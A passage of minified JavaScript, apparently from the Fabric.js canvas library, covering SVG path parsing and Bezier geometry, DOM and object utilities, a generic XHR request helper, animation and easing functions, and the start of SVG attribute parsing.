Ue=Math.PI,Xe=Ae*Ue/180,He=j.util.sin(Xe),Be=j.util.cos(Xe),qe=0,De=0,Ve=-Be*h*.5-He*R*.5,ze=-Be*R*.5+He*h*.5,me=(J=Math.abs(J))*J,Ke=(Z=Math.abs(Z))*Z,rt=ze*ze,Ge=Ve*Ve,Qe=me*Ke-me*rt-Ke*Ge,ht=0;if(Qe<0){var mt=Math.sqrt(1-Qe/(me*Ke));J*=mt,Z*=mt}else ht=(ue===Ie?-1:1)*Math.sqrt(Qe/(me*rt+Ke*Ge));var lt=ht*J*ze/Z,ft=-ht*Z*Ve/J,xe=Be*lt-He*ft+.5*h,We=He*lt+Be*ft+.5*R,Je=M(1,0,(Ve-lt)/J,(ze-ft)/Z),Oe=M((Ve-lt)/J,(ze-ft)/Z,(-Ve-lt)/J,(-ze-ft)/Z);0===Ie&&Oe>0?Oe-=2*Ue:1===Ie&&Oe<0&&(Oe+=2*Ue);for(var Te=Math.ceil(Math.abs(Oe/Ue*2)),Le=[],$e=Oe/Te,st=8/3*Math.sin($e/4)*Math.sin($e/4)/Math.sin($e/2),xt=Je+$e,pt=0;pt<Te;pt++)Le[pt]=_(Je,xt,Be,He,J,Z,xe,We,st,qe,De),qe=Le[pt][5],De=Le[pt][6],Je=xt,xt+=$e;return Le}(J[6]-h,J[7]-R,J[1],J[2],J[4],J[5],J[3]),qe=0,De=Be.length;qe<De;qe++)Be[qe][1]+=h,Be[qe][2]+=R,Be[qe][3]+=h,Be[qe][4]+=R,Be[qe][5]+=h,Be[qe][6]+=R;return Be}function x(h,R,J,Z){return Math.sqrt((J-h)*(J-h)+(Z-R)*(Z-R))}function ee(h,R,J,Z,ue,Ie,Ae,Ue){return function(Xe){var He=function S(h){return h*h*h}(Xe),Be=function O(h){return 3*h*h*(1-h)}(Xe),qe=function U(h){return 3*h*(1-h)*(1-h)}(Xe),De=function K(h){return(1-h)*(1-h)*(1-h)}(Xe);return{x:Ae*He+ue*Be+J*qe+h*De,y:Ue*He+Ie*Be+Z*qe+R*De}}}function se(h,R,J,Z,ue,Ie,Ae,Ue){return function(Xe){var He=1-Xe;return Math.atan2(3*He*He*(Z-R)+6*He*Xe*(Ie-Z)+3*Xe*Xe*(Ue-Ie),3*He*He*(J-h)+6*He*Xe*(ue-J)+3*Xe*Xe*(Ae-ue))}}function z(h,R,J,Z,ue,Ie){return function(Ae){var Ue=function ve(h){return h*h}(Ae),Xe=function le(h){return 2*h*(1-h)}(Ae),He=function ye(h){return(1-h)*(1-h)}(Ae);return{x:ue*Ue+J*Xe+h*He,y:Ie*Ue+Z*Xe+R*He}}}function l(h,R,J,Z,ue,Ie){return function(Ae){var Ue=1-Ae;return Math.atan2(2*Ue*(Z-R)+2*Ae*(Ie-Z),2*Ue*(J-h)+2*Ae*(ue-J))}}function f(h,R,J){var ue,Ae,Z={x:R,y:J},Ie=0;for(Ae=1;Ae<=100;Ae+=1)ue=h(Ae/100),Ie+=x(Z.x,Z.y,ue.x,ue.y),Z=ue;return Ie}function v(h){for(var Z,He,Be,qe,R=0,J=h.length,ue=0,Ie=0,Ae=0,Ue=0,Xe=[],De=0;De<J;De++){switch(Be={x:ue,y:Ie,command:(Z=h[De])[0]},Z[0]){case"M":Be.length=0,Ae=ue=Z[1],Ue=Ie=Z[2];break;case"L":Be.length=x(ue,Ie,Z[1],Z[2]),ue=Z[1],Ie=Z[2];break;case"C":He=ee(ue,Ie,Z[1],Z[2],Z[3],Z[4],Z[5],Z[6]),qe=se(ue,Ie,Z[1],Z[2],Z[3],Z[4],Z[5],Z[6]),Be.iterator=He,Be.angleFinder=qe,Be.length=f(He,ue,Ie),ue=Z[5],Ie=Z[6];break;case"Q":He=z(ue,Ie,Z[1],Z[2],Z[3],Z[4]),qe=l(ue,Ie,Z[1],Z[2],Z[3],Z[4]),Be.iterator=He,Be.angleFinder=qe,Be.length=f(He,ue,Ie),ue=Z[3],Ie=Z[4];break;case"Z":case"z":Be.destX=Ae,Be.destY=Ue,Be.length=x(ue,Ie,Ae,Ue),ue=Ae,Ie=Ue}R+=Be.length,Xe.push(Be)}return Xe.push({length:R,x:ue,y:Ie}),Xe}j.util.joinPath=function(h){return h.map(function(R){return R.join(" ")}).join(" ")},j.util.parsePath=function G(h){var Z,ue,qe,De,Ve,R=[],J=[],Ie=j.rePathCommand,Ae="[-+]?(?:\\d*\\.\\d+|\\d+\\.?)(?:[eE][-+]?\\d+)?\\s*",Ue="("+Ae+")"+j.commaWsp,Xe="([01])"+j.commaWsp+"?",Be=new RegExp(Ue+"?"+Ue+"?"+Ue+Xe+Xe+Ue+"?("+Ae+")","g");if(!h||!h.match)return R;for(var me,ze=0,Ke=(Ve=h.match(/[mzlhvcsqta][^mzlhvcsqta]*/gi)).length;ze<Ke;ze++){De=(Z=Ve[ze]).slice(1).trim(),J.length=0;var rt=Z.charAt(0);if(me=[rt],"a"===rt.toLowerCase())for(var Ge;Ge=Be.exec(De);)for(var Qe=1;Qe<Ge.length;Qe++)J.push(Ge[Qe]);else for(;qe=Ie.exec(De);)J.push(qe[0]);Qe=0;for(var ht=J.length;Qe<ht;Qe++)ue=parseFloat(J[Qe]),isNaN(ue)||me.push(ue);var mt=g[rt.toLowerCase()],lt=b[rt]||rt;if(me.length-1>mt)for(var ft=1,xe=me.length;ft<xe;ft+=mt)R.push([rt].concat(me.slice(ft,ft+mt))),rt=lt;else R.push(me)}return R},j.util.makePathSimpler=function w(h){var Ae,Ue,Xe,Be,qe,De,R=0,J=0,Z=h.length,ue=0,Ie=0,He=[];for(Ue=0;Ue<Z;++Ue){switch(Xe=!1,(Ae=h[Ue].slice(0))[0]){case"l":Ae[0]="L",Ae[1]+=R,Ae[2]+=J;case"L":R=Ae[1],J=Ae[2];break;case"h":Ae[1]+=R;case"H":Ae[0]="L",Ae[2]=J,R=Ae[1];break;case"v":Ae[1]+=J;case"V":Ae[0]="L",J=Ae[1],Ae[1]=R,Ae[2]=J;break;case"m":Ae[0]="M",Ae[1]+=R,Ae[2]+=J;case"M":R=Ae[1],J=Ae[2],ue=Ae[1],Ie=Ae[2];break;case"c":Ae[0]="C",Ae[1]+=R,Ae[2]+=J,Ae[3]+=R,Ae[4]+=J,Ae[5]+=R,Ae[6]+=J;case"C":qe=Ae[3],De=Ae[4],R=Ae[5],J=Ae[6];break;case"s":Ae[0]="S",Ae[1]+=R,Ae[2]+=J,Ae[3]+=R,Ae[4]+=J;case"S":"C"===Be?(qe=2*R-qe,De=2*J-De):(qe=R,De=J),R=Ae[3],J=Ae[4],Ae[0]="C",Ae[5]=Ae[3],Ae[6]=Ae[4],Ae[3]=Ae[1],Ae[4]=Ae[2],Ae[1]=qe,Ae[2]=De,qe=Ae[3],De=Ae[4];break;case"q":Ae[0]="Q",Ae[1]+=R,Ae[2]+=J,Ae[3]+=R,Ae[4]+=J;case"Q":qe=Ae[1],De=Ae[2],R=Ae[3],J=Ae[4];break;case"t":Ae[0]="T",Ae[1]+=R,Ae[2]+=J;case"T":"Q"===Be?(qe=2*R-qe,De=2*J-De):(qe=R,De=J),Ae[0]="Q",R=Ae[1],J=Ae[2],Ae[1]=qe,Ae[2]=De,Ae[3]=R,Ae[4]=J;break;case"a":Ae[0]="A",Ae[6]+=R,Ae[7]+=J;case"A":Xe=!0,He=He.concat(D(R,J,Ae)),R=Ae[6],J=Ae[7];break;case"z":case"Z":R=ue,J=Ie}Xe||He.push(Ae),Be=Ae[0]}return He},j.util.getSmoothPathFromPoints=function X(h,R){var Z,J=[],ue=new j.Point(h[0].x,h[0].y),Ie=new j.Point(h[1].x,h[1].y),Ae=h.length,Ue=1,Xe=0,He=Ae>2;for(He&&(Ue=h[2].x<Ie.x?-1:h[2].x===Ie.x?0:1,Xe=h[2].y<Ie.y?-1:h[2].y===Ie.y?0:1),J.push(["M",ue.x-Ue*(R=R||0),ue.y-Xe*R]),Z=1;Z<Ae;Z++){if(!ue.eq(Ie)){var Be=ue.midPointFrom(Ie);J.push(["Q",ue.x,ue.y,Be.x,Be.y])}ue=h[Z],Z+1<h.length&&(Ie=h[Z+1])}return He&&(Ue=ue.x>h[Z-2].x?1:ue.x===h[Z-2].x?0:-1,Xe=ue.y>h[Z-2].y?1:ue.y===h[Z-2].y?0:-1),J.push(["L",ue.x+Ue*R,ue.y+Xe*R]),J},j.util.getPathSegmentsInfo=v,j.util.getBoundsOfCurve=function p(h,R,J,Z,ue,Ie,Ae,Ue){var Xe;if(j.cachesBoundsOfCurve&&(Xe=E.call(arguments),j.boundsOfCurveCache[Xe]))return j.boundsOfCurveCache[Xe];var me,Ke,rt,Ge,Qe,ht,mt,lt,He=Math.sqrt,Be=Math.min,qe=Math.max,De=Math.abs,Ve=[],ze=[[],[]];Ke=6*h-12*J+6*ue,me=-3*h+9*J-9*ue+3*Ae,rt=3*J-3*h;for(var ft=0;ft<2;++ft)if(ft>0&&(Ke=6*R-12*Z+6*Ie,me=-3*R+9*Z-9*Ie+3*Ue,rt=3*Z-3*R),De(me)<1e-12){if(De(Ke)<1e-12)continue;0<(Ge=-rt/Ke)&&Ge<1&&Ve.push(Ge)}else!((mt=Ke*Ke-4*rt*me)<0)&&(0<(Qe=(-Ke+(lt=He(mt)))/(2*me))&&Qe<1&&Ve.push(Qe),0<(ht=(-Ke-lt)/(2*me))&&ht<1&&Ve.push(ht));for(var Te,Je=Ve.length,Oe=Je;Je--;)ze[0][Je]=(Te=1-(Ge=Ve[Je]))*Te*Te*h+3*Te*Te*Ge*J+3*Te*Ge*Ge*ue+Ge*Ge*Ge*Ae,ze[1][Je]=Te*Te*Te*R+3*Te*Te*Ge*Z+3*Te*Ge*Ge*Ie+Ge*Ge*Ge*Ue;ze[0][Oe]=h,ze[1][Oe]=R,ze[0][Oe+1]=Ae,ze[1][Oe+1]=Ue;var Le=[{x:Be.apply(null,ze[0]),y:Be.apply(null,ze[1])},{x:qe.apply(null,ze[0]),y:qe.apply(null,ze[1])}];return j.cachesBoundsOfCurve&&(j.boundsOfCurveCache[Xe]=Le),Le},j.util.getPointOnPath=function P(h,R,J){J||(J=v(h));for(var Z=0;R-J[Z].length>0&&Z<J.length-2;)R-=J[Z].length,Z++;var Xe,ue=J[Z],Ie=R/ue.length,Ue=h[Z];switch(ue.command){case"M":return{x:ue.x,y:ue.y,angle:0};case"Z":case"z":return(Xe=new j.Point(ue.x,ue.y).lerp(new j.Point(ue.destX,ue.destY),Ie)).angle=Math.atan2(ue.destY-ue.y,ue.destX-ue.x),Xe;case"L":return(Xe=new j.Point(ue.x,ue.y).lerp(new j.Point(Ue[1],Ue[2]),Ie)).angle=Math.atan2(Ue[2]-ue.y,Ue[1]-ue.x),Xe;case"C":case"Q":return function A(h,R){for(var Ae,Ue,Be,J=0,Z=0,ue=h.iterator,Ie={x:h.x,y:h.y},Xe=.01,He=h.angleFinder;Z<R&&Xe>1e-4;)Ae=ue(J),Be=J,(Ue=x(Ie.x,Ie.y,Ae.x,Ae.y))+Z>R?(J-=Xe,Xe/=2):(Ie=Ae,J+=Xe,Z+=Ue);return Ae.angle=He(Be),Ae}(ue,R)}},j.util.transformPath=function L(h,R,J){return J&&(R=j.util.multiplyTransformMatrices(R,[1,0,0,1,-J.x,-J.y])),h.map(function(Z){for(var ue=Z.slice(0),Ie={},Ae=1;Ae<Z.length-1;Ae+=2)Ie.x=Z[Ae],Ie.y=Z[Ae+1],Ie=j.util.transformPoint(Ie,R),ue[Ae]=Ie.x,ue[Ae+1]=Ie.y;return ue})}}(),function(){var E=Array.prototype.slice;function M(p,D,w){if(p&&0!==p.length){var x=p.length-1,S=D?p[x][D]:p[x];if(D)for(;x--;)w(p[x][D],S)&&(S=p[x][D]);else for(;x--;)w(p[x],S)&&(S=p[x]);return S}}j.util.array={fill:function y(p,D){for(var w=p.length;w--;)p[w]=D;return p},invoke:function g(p,D){for(var w=E.call(arguments,2),x=[],S=0,O=p.length;S<O;S++)x[S]=w.length?p[S][D].apply(p[S],w):p[S][D].call(p[S]);return x},min:function _(p,D){return M(p,D,function(w,x){return w<x})},max:function b(p,D){return M(p,D,function(w,x){return w>=x})}}}(),function(){function E(b,_,y){if(y)if(!j.isLikelyNode&&_ instanceof Element)b=_;else if(_ instanceof Array){b=[];for(var M=0,p=_.length;M<p;M++)b[M]=E({},_[M],y)}else if(_&&"object"==typeof _)for(var D in _)"canvas"===D||"group"===D?b[D]=null:_.hasOwnProperty(D)&&(b[D]=E({},_[D],y));else b=_;else for(var D in _)b[D]=_[D];return b}j.util.object={extend:E,clone:function g(b,_){return E({},b,_)}},j.util.object.extend(j.util,j.Observable)}(),function(){function y(M,p){var D=M.charCodeAt(p);if(isNaN(D))return"";if(D<55296||D>57343)return M.charAt(p);if(55296<=D&&D<=56319){if(M.length<=p+1)throw"High surrogate without following low surrogate";var w=M.charCodeAt(p+1);if(56320>w||w>57343)throw"High surrogate without following low surrogate";return M.charAt(p)+M.charAt(p+1)}if(0===p)throw"Low surrogate without preceding high surrogate";var x=M.charCodeAt(p-1);if(55296>x||x>56319)throw"Low surrogate without preceding high surrogate";return!1}j.util.string={camelize:function E(M){return M.replace(/-+(.)?/g,function(p,D){return D?D.toUpperCase():""})},capitalize:function g(M,p){return M.charAt(0).toUpperCase()+(p?M.slice(1):M.slice(1).toLowerCase())},escapeXml:function b(M){return M.replace(/&/g,"&amp;").replace(/"/g,"&quot;").replace(/'/g,"&apos;").replace(/</g,"&lt;").replace(/>/g,"&gt;")},graphemeSplit:function _(M){var D,p=0,w=[];for(p=0;p<M.length;p++)!1!==(D=y(M,p))&&w.push(D);return w}}}(),function(){var E=Array.prototype.slice,g=function(){},b=function(){for(var D in{toString:1})if("toString"===D)return!1;return!0}(),_=function(D,w,x){for(var S in w)D.prototype[S]=S in D.prototype&&"function"==typeof D.prototype[S]&&(w[S]+"").indexOf("callSuper")>-1?function(O){return function(){var U=this.constructor.superclass;this.constructor.superclass=x;var K=w[O].apply(this,arguments);if(this.constructor.superclass=U,"initialize"!==O)return K}}(S):w[S],b&&(w.toString!==Object.prototype.toString&&(D.prototype.toString=w.toString),w.valueOf!==Object.prototype.valueOf&&(D.prototype.valueOf=w.valueOf))};function y(){}function M(D){for(var w=null,x=this;x.constructor.superclass;){var S=x.constructor.superclass.prototype[D];if(x[D]!==S){w=S;break}x=x.constructor.superclass.prototype}return w?arguments.length>1?w.apply(this,E.call(arguments,1)):w.call(this):console.log("tried to callSuper "+D+", method not found in prototype chain",this)}j.util.createClass=function p(){var D=null,w=E.call(arguments,0);function x(){this.initialize.apply(this,arguments)}"function"==typeof w[0]&&(D=w.shift()),x.superclass=D,x.subclasses=[],D&&(y.prototype=D.prototype,x.prototype=new y,D.subclasses.push(x));for(var S=0,O=w.length;S<O;S++)_(x,w[S],D);return x.prototype.initialize||(x.prototype.initialize=g),x.prototype.constructor=x,x.prototype.callSuper=M,x}}(),function(){var E=!!j.document.createElement("div").attachEvent,g=["touchstart","touchmove","touchend"];j.util.addListener=function(_,y,M,p){_&&_.addEventListener(y,M,!E&&p)},j.util.removeListener=function(_,y,M,p){_&&_.removeEventListener(y,M,!E&&p)},j.util.getPointer=function(_){var M=j.util.getScrollLeftTop(_.target),p=function b(_){var y=_.changedTouches;return y&&y[0]?y[0]:_}(_);return{x:p.clientX+M.left,y:p.clientY+M.top}},j.util.isTouchEvent=function(_){return g.indexOf(_.type)>-1||"touch"===_.pointerType}}(),function(){var g=j.document.createElement("div"),y=/alpha\s*\(\s*opacity\s*=\s*([^\)]+)\)/,M=function(p){return p};"string"==typeof g.style.opacity?M=function(p,D){return p.style.opacity=D,p}:"string"==typeof g.style.filter&&(M=function(p,D){var w=p.style;return p.currentStyle&&!p.currentStyle.hasLayout&&(w.zoom=1),y.test(w.filter)?w.filter=w.filter.replace(y,D=D>=.9999?"":"alpha(opacity="+100*D+")"):w.filter+=" alpha(opacity="+100*D+")",p}),j.util.setStyle=function E(p,D){var w=p.style;if(!w)return p;if("string"==typeof D)return p.style.cssText+=";"+D,D.indexOf("opacity")>-1?M(p,D.match(/opacity:\s*(\d?\.?\d*)/)[1]):p;for(var x in D)"opacity"===x?M(p,D[x]):w.setProperty("float"===x||"cssFloat"===x?void 0===w.styleFloat?"cssFloat":"styleFloat":x,D[x]);return p}}(),function(){var b,x,K,ee,E=Array.prototype.slice,_=function(K){return E.call(K,0)};try{b=_(j.document.childNodes)instanceof Array}catch(K){}function y(K,ee){var se=j.document.createElement(K);for(var ve in ee)"class"===ve?se.className=ee[ve]:"for"===ve?se.htmlFor=ee[ve]:se.setAttribute(ve,ee[ve]);return se}function D(K){for(var ee=0,se=0,ve=j.document.documentElement,le=j.document.body||{scrollLeft:0,scrollTop:0};K&&(K.parentNode||K.host)&&((K=K.parentNode||K.host)===j.document?(ee=le.scrollLeft||ve.scrollLeft||0,se=le.scrollTop||ve.scrollTop||0):(ee+=K.scrollLeft||0,se+=K.scrollTop||0),1!==K.nodeType||"fixed"!==K.style.position););return{left:ee,top:se}}b||(_=function(K){for(var ee=new Array(K.length),se=K.length;se--;)ee[se]=K[se];return ee}),x=j.document.defaultView&&j.document.defaultView.getComputedStyle?function(K,ee){var se=j.document.defaultView.getComputedStyle(K,null);return se?se[ee]:void 0}:function(K,ee){var se=K.style[ee];return!se&&K.currentStyle&&(se=K.currentStyle[ee]),se},ee="userSelect"in(K=j.document.documentElement.style)?"userSelect":"MozUserSelect"in K?"MozUserSelect":"WebkitUserSelect"in K?"WebkitUserSelect":"KhtmlUserSelect"in K?"KhtmlUserSelect":"",j.util.makeElementUnselectable=function se(le){return void 0!==le.onselectstart&&(le.onselectstart=j.util.falseFunction),ee?le.style[ee]="none":"string"==typeof le.unselectable&&(le.unselectable="on"),le},j.util.makeElementSelectable=function ve(le){return void 0!==le.onselectstart&&(le.onselectstart=null),ee?le.style[ee]="":"string"==typeof le.unselectable&&(le.unselectable=""),le},j.util.setImageSmoothing=function U(K,ee){K.imageSmoothingEnabled=K.imageSmoothingEnabled||K.webkitImageSmoothingEnabled||K.mozImageSmoothingEnabled||K.msImageSmoothingEnabled||K.oImageSmoothingEnabled,K.imageSmoothingEnabled=ee},j.util.getById=function g(K){return"string"==typeof K?j.document.getElementById(K):K},j.util.toArray=_,j.util.addClass=function M(K,ee){K&&-1===(" "+K.className+" ").indexOf(" "+ee+" ")&&(K.className+=(K.className?" ":"")+ee)},j.util.makeElement=y,j.util.wrapElement=function p(K,ee,se){return"string"==typeof ee&&(ee=y(ee,se)),K.parentNode&&K.parentNode.replaceChild(ee,K),ee.appendChild(K),ee},j.util.getScrollLeftTop=D,j.util.getElementOffset=function w(K){var ee,ye,se=K&&K.ownerDocument,ve={left:0,top:0},le={left:0,top:0},z={borderLeftWidth:"left",borderTopWidth:"top",paddingLeft:"left",paddingTop:"top"};if(!se)return le;for(var l in z)le[z[l]]+=parseInt(x(K,l),10)||0;return ee=se.documentElement,void 0!==K.getBoundingClientRect&&(ve=K.getBoundingClientRect()),ye=D(K),{left:ve.left+ye.left-(ee.clientLeft||0)+le.left,top:ve.top+ye.top-(ee.clientTop||0)+le.top}},j.util.getNodeCanvas=function S(K){var ee=j.jsdomImplForWrapper(K);return ee._canvas||ee._image},j.util.cleanUpJsdomNode=function O(K){if(j.isLikelyNode){var ee=j.jsdomImplForWrapper(K);ee&&(ee._image=null,ee._canvas=null,ee._currentSrc=null,ee._attributes=null,ee._classList=null)}}}(),function(){function g(){}j.util.request=function b(_,y){y||(y={});var M=y.method?y.method.toUpperCase():"GET",p=y.onComplete||function(){},D=new j.window.XMLHttpRequest,w=y.body||y.parameters;return D.onreadystatechange=function(){4===D.readyState&&(p(D),D.onreadystatechange=g)},"GET"===M&&(w=null,"string"==typeof y.parameters&&(_=function E(_,y){return _+(/\?/.test(_)?"&":"?")+y}(_,y.parameters))),D.open(M,_,!0),("POST"===M||"PUT"===M)&&D.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),D.send(w),D}}(),j.log=console.log,j.warn=console.warn,function(){var E=j.util.object.extend,g=j.util.object.clone,b=[];function _(){return!1}function y(S,O,U,K){return-U*Math.cos(S/K*(Math.PI/2))+U+O}j.util.object.extend(b,{cancelAll:function(){var S=this.splice(0);return S.forEach(function(O){O.cancel()}),S},cancelByCanvas:function(S){if(!S)return[];var O=this.filter(function(U){return"object"==typeof U.target&&U.target.canvas===S});return O.forEach(function(U){U.cancel()}),O},cancelByTarget:function(S){var O=this.findAnimationsByTarget(S);return O.forEach(function(U){U.cancel()}),O},findAnimationIndex:function(S){return this.indexOf(this.findAnimation(S))},findAnimation:function(S){return this.find(function(O){return O.cancel===S})},findAnimationsByTarget:function(S){return S?this.filter(function(O){return O.target===S}):[]}});var p=j.window.requestAnimationFrame||j.window.webkitRequestAnimationFrame||j.window.mozRequestAnimationFrame||j.window.oRequestAnimationFrame||j.window.msRequestAnimationFrame||function(S){return j.window.setTimeout(S,1e3/60)},D=j.window.cancelAnimationFrame||j.window.clearTimeout;function w(){return p.apply(j.window,arguments)}j.util.animate=function M(S){S||(S={});var U,O=!1,K=function(){var ee=j.runningAnimations.indexOf(U);return ee>-1&&j.runningAnimations.splice(ee,1)[0]};return U=E(g(S),{cancel:function(){return O=!0,K()},currentValue:"startValue"in S?S.startValue:0,completionRate:0,durationRate:0}),j.runningAnimations.push(U),w(function(ee){var ye,se=ee||+new Date,ve=S.duration||500,le=se+ve,z=S.onChange||_,l=S.abort||_,f=S.onComplete||_,A=S.easing||y,v="startValue"in S&&S.startValue.length>0,P="startValue"in S?S.startValue:0,G="endValue"in S?S.endValue:100,X=S.byValue||(v?P.map(function(L,h){return G[h]-P[h]}):G-P);S.onStart&&S.onStart(),function L(h){var R=(ye=h||+new Date)>le?ve:ye-se,J=R/ve,Z=v?P.map(function(Ie,Ae){return A(R,P[Ae],X[Ae],ve)}):A(R,P,X,ve),ue=Math.abs(v?(Z[0]-P[0])/X[0]:(Z-P)/X);if(U.currentValue=v?Z.slice():Z,U.completionRate=ue,U.durationRate=J,!O){if(l(Z,ue,J))return void K();if(ye>le)return U.currentValue=v?G.slice():G,U.completionRate=1,U.durationRate=1,z(v?G.slice():G,1,1),f(G,1,1),void K();z(Z,ue,J),w(L)}}(se)}),U.cancel},j.util.requestAnimFrame=w,j.util.cancelAnimFrame=function x(){return D.apply(j.window,arguments)},j.runningAnimations=b}(),function(){function E(b,_,y){var M="rgba("+parseInt(b[0]+y*(_[0]-b[0]),10)+","+parseInt(b[1]+y*(_[1]-b[1]),10)+","+parseInt(b[2]+y*(_[2]-b[2]),10);return(M+=","+(b&&_?parseFloat(b[3]+y*(_[3]-b[3])):1))+")"}j.util.animateColor=function g(b,_,y,M){var p=new j.Color(b).getSource(),D=new j.Color(_).getSource(),w=M.onComplete,x=M.onChange;return j.util.animate(j.util.object.extend(M=M||{},{duration:y||500,startValue:p,endValue:D,byValue:D,easing:function(S,O,U,K){return E(O,U,M.colorEasing?M.colorEasing(S,K):1-Math.cos(S/K*(Math.PI/2)))},onComplete:function(S,O,U){if(w)return w(E(D,D,0),O,U)},onChange:function(S,O,U){if(x){if(Array.isArray(S))return x(E(S,S,0),O,U);x(S,O,U)}}}))}}(),function(){function E(h,R,J,Z){return h<Math.abs(R)?(h=R,Z=J/4):Z=0===R&&0===h?J/(2*Math.PI)*Math.asin(1):J/(2*Math.PI)*Math.asin(R/h),{a:h,c:R,p:J,s:Z}}function g(h,R,J){return h.a*Math.pow(2,10*(R-=1))*Math.sin((R*J-h.s)*(2*Math.PI)/h.p)}function G(h,R,J,Z){return J-X(Z-h,0,J,Z)+R}function X(h,R,J,Z){return(h/=Z)<1/2.75?J*(7.5625*h*h)+R:h<2/2.75?J*(7.5625*(h-=1.5/2.75)*h+.75)+R:h<2.5/2.75?J*(7.5625*(h-=2.25/2.75)*h+.9375)+R:J*(7.5625*(h-=2.625/2.75)*h+.984375)+R}j.util.ease={easeInQuad:function(h,R,J,Z){return J*(h/=Z)*h+R},easeOutQuad:function(h,R,J,Z){return-J*(h/=Z)*(h-2)+R},easeInOutQuad:function(h,R,J,Z){return(h/=Z/2)<1?J/2*h*h+R:-J/2*(--h*(h-2)-1)+R},easeInCubic:function(h,R,J,Z){return J*(h/=Z)*h*h+R},easeOutCubic:function b(h,R,J,Z){return J*((h=h/Z-1)*h*h+1)+R},easeInOutCubic:function _(h,R,J,Z){return(h/=Z/2)<1?J/2*h*h*h+R:J/2*((h-=2)*h*h+2)+R},easeInQuart:function y(h,R,J,Z){return J*(h/=Z)*h*h*h+R},easeOutQuart:function M(h,R,J,Z){return-J*((h=h/Z-1)*h*h*h-1)+R},easeInOutQuart:function p(h,R,J,Z){return(h/=Z/2)<1?J/2*h*h*h*h+R:-J/2*((h-=2)*h*h*h-2)+R},easeInQuint:function D(h,R,J,Z){return J*(h/=Z)*h*h*h*h+R},easeOutQuint:function w(h,R,J,Z){return J*((h=h/Z-1)*h*h*h*h+1)+R},easeInOutQuint:function x(h,R,J,Z){return(h/=Z/2)<1?J/2*h*h*h*h*h+R:J/2*((h-=2)*h*h*h*h+2)+R},easeInSine:function S(h,R,J,Z){return-J*Math.cos(h/Z*(Math.PI/2))+J+R},easeOutSine:function O(h,R,J,Z){return J*Math.sin(h/Z*(Math.PI/2))+R},easeInOutSine:function U(h,R,J,Z){return-J/2*(Math.cos(Math.PI*h/Z)-1)+R},easeInExpo:function K(h,R,J,Z){return 0===h?R:J*Math.pow(2,10*(h/Z-1))+R},easeOutExpo:function ee(h,R,J,Z){return h===Z?R+J:J*(1-Math.pow(2,-10*h/Z))+R},easeInOutExpo:function se(h,R,J,Z){return 0===h?R:h===Z?R+J:(h/=Z/2)<1?J/2*Math.pow(2,10*(h-1))+R:J/2*(2-Math.pow(2,-10*--h))+R},easeInCirc:function ve(h,R,J,Z){return-J*(Math.sqrt(1-(h/=Z)*h)-1)+R},easeOutCirc:function le(h,R,J,Z){return J*Math.sqrt(1-(h=h/Z-1)*h)+R},easeInOutCirc:function ye(h,R,J,Z){return(h/=Z/2)<1?-J/2*(Math.sqrt(1-h*h)-1)+R:J/2*(Math.sqrt(1-(h-=2)*h)+1)+R},easeInElastic:function z(h,R,J,Z){var Ie=0;return 0===h?R:1==(h/=Z)?R+J:(Ie||(Ie=.3*Z),-g(E(J,J,Ie,1.70158),h,Z)+R)},easeOutElastic:function l(h,R,J,Z){var Ie=0;if(0===h)return R;if(1==(h/=Z))return R+J;Ie||(Ie=.3*Z);var Ue=E(J,J,Ie,1.70158);return Ue.a*Math.pow(2,-10*h)*Math.sin((h*Z-Ue.s)*(2*Math.PI)/Ue.p)+Ue.c+R},easeInOutElastic:function f(h,R,J,Z){var Ie=0;if(0===h)return R;if(2==(h/=Z/2))return R+J;Ie||(Ie=Z*(.3*1.5));var Ue=E(J,J,Ie,1.70158);return h<1?-.5*g(Ue,h,Z)+R:Ue.a*Math.pow(2,-10*(h-=1))*Math.sin((h*Z-Ue.s)*(2*Math.PI)/Ue.p)*.5+Ue.c+R},easeInBack:function A(h,R,J,Z,ue){return void 0===ue&&(ue=1.70158),J*(h/=Z)*h*((ue+1)*h-ue)+R},easeOutBack:function v(h,R,J,Z,ue){return void 0===ue&&(ue=1.70158),J*((h=h/Z-1)*h*((ue+1)*h+ue)+1)+R},easeInOutBack:function P(h,R,J,Z,ue){return void 0===ue&&(ue=1.70158),(h/=Z/2)<1?J/2*(h*h*((1+(ue*=1.525))*h-ue))+R:J/2*((h-=2)*h*((1+(ue*=1.525))*h+ue)+2)+R},easeInBounce:G,easeOutBounce:X,easeInOutBounce:function L(h,R,J,Z){return h<Z/2?.5*G(2*h,0,J,Z)+R:.5*X(2*h-Z,0,J,Z)+.5*J+R}}}(),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.extend,_=g.util.object.clone,y=g.util.toFixed,M=g.util.parseUnit,p=g.util.multiplyTransformMatrices,O={cx:"left",x:"left",r:"radius",cy:"top",y:"top",display:"visible",visibility:"visible",transform:"transformMatrix","fill-opacity":"fillOpacity","fill-rule":"fillRule","font-family":"fontFamily","font-size":"fontSize","font-style":"fontStyle","font-weight":"fontWeight","letter-spacing":"charSpacing","paint-order":"paintFirst","stroke-dasharray":"strokeDashArray","stroke-dashoffset":"strokeDashOffset","stroke-linecap":"strokeLineCap","stroke-linejoin":"strokeLineJoin","stroke-miterlimit":"strokeMiterLimit","stroke-opacity":"strokeOpacity","stroke-width":"strokeWidth","text-decoration":"textDecoration","text-anchor":"textAnchor",opacity:"opacity","clip-path":"clipPath","clip-rule":"clipRule","vector-effect":"strokeUniform","image-rendering":"imageSmoothing"},U={stroke:"strokeOpacity",fill:"fillOpacity"},K="font-size",ee="clip-path";function se(Ie){return Ie in O?O[Ie]:Ie}function ve(Ie,Ae,Ue,Xe){var Be,He=Array.isArray(Ae);if("fill"!==Ie&&"stroke"!==Ie||"none"!==Ae){if("strokeUniform"===Ie)return"non-scaling-stroke"===Ae;if("strokeDashArray"===Ie)Ae="none"===Ae?null:Ae.replace(/,/g," ").split(/\s+/).map(parseFloat);else if("transformMatrix"===Ie)Ae=Ue&&Ue.transformMatrix?p(Ue.transformMatrix,g.parseTransformAttribute(Ae)):g.parseTransformAttribute(Ae);else if("visible"===Ie)Ae="none"!==Ae&&"hidden"!==Ae,Ue&&!1===Ue.visible&&(Ae=!1);else if("opacity"===Ie)Ae=parseFloat(Ae),Ue&&void 0!==Ue.opacity&&(Ae*=Ue.opacity);else if("textAnchor"===Ie)Ae="start"===Ae?"left":"end"===Ae?"right":"center";else if("charSpacing"===Ie)Be=M(Ae,Xe)/Xe*1e3;else if("paintFirst"===Ie){var 